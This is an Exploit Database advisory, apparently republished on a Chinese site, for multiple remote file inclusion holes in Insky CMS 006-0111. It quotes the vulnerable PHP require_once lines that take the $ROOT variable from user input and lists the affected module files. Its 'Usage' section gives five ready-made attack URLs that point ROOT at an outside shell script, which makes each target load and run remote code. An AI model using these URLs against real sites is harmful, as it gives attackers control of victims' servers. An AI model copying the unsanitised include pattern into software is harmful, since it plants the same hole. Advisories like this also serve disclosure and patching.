Insky CMS 006-0111 – Multiple Remote File Inclusions

• Exploit Database
• 5 阅读

• 作者： mat
  日期： 2010-03-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11848/

• \\\|///
  \\- -//
   (@ @ )
  ----oOOo--(_)-oOOo--------------------------------------------------
  Insky CMS v006-0111 Multiple Remote File Include Vulnerability
  Script: http://code.google.com/p/insky/downloads/list
  Author: mat
  Mail: rahmat_punk@hotmail.com
  ---------------Ooooo------------------------------------------------
   ( )
  ooooO ) /
  ( )(_/
   \ (
  \_)
  
  Vuln Code 
  
  <?...
  require_once $ROOT."/insky/class/ext/js/class.js.php";
  ...?>
  
  (insky/modules/city.get/city.get.php)
  (insky/modules/city.get/index.php)
  (insky/modules/message2.send/message.send.php)
  (insky/modules/message.send/message.send.php)
  
  
  <?...
  require_once($ROOT."/insky/class/ext/wiki/parserutils.php");
  require_once($ROOT.'/insky/wysiwyg/config.php');
  require_once($ROOT.'/insky/wysiwyg/editor_class.php');
  ...?>
  
  (insky/modules/pages.add/pages.add.php)
  
  Usage: http://[target]/[path]/modules/city.get/city.get.php?ROOT=http://[shellscript]
   http://[target]/[path]/modules/city.get/index.php?ROOT=http://[shellscript]
   http://[target]/[path]/modules/message2.send/message.send.php?ROOT=http://[shellscript]
   http://[target]/[path]/modules/message.send/message.send.php?ROOT=http://[shellscript]
   http://[target]/[path]/modules/pages.add/pages.add.php?ROOT=http://[shellscript]
  
  Greetings: All Hackerz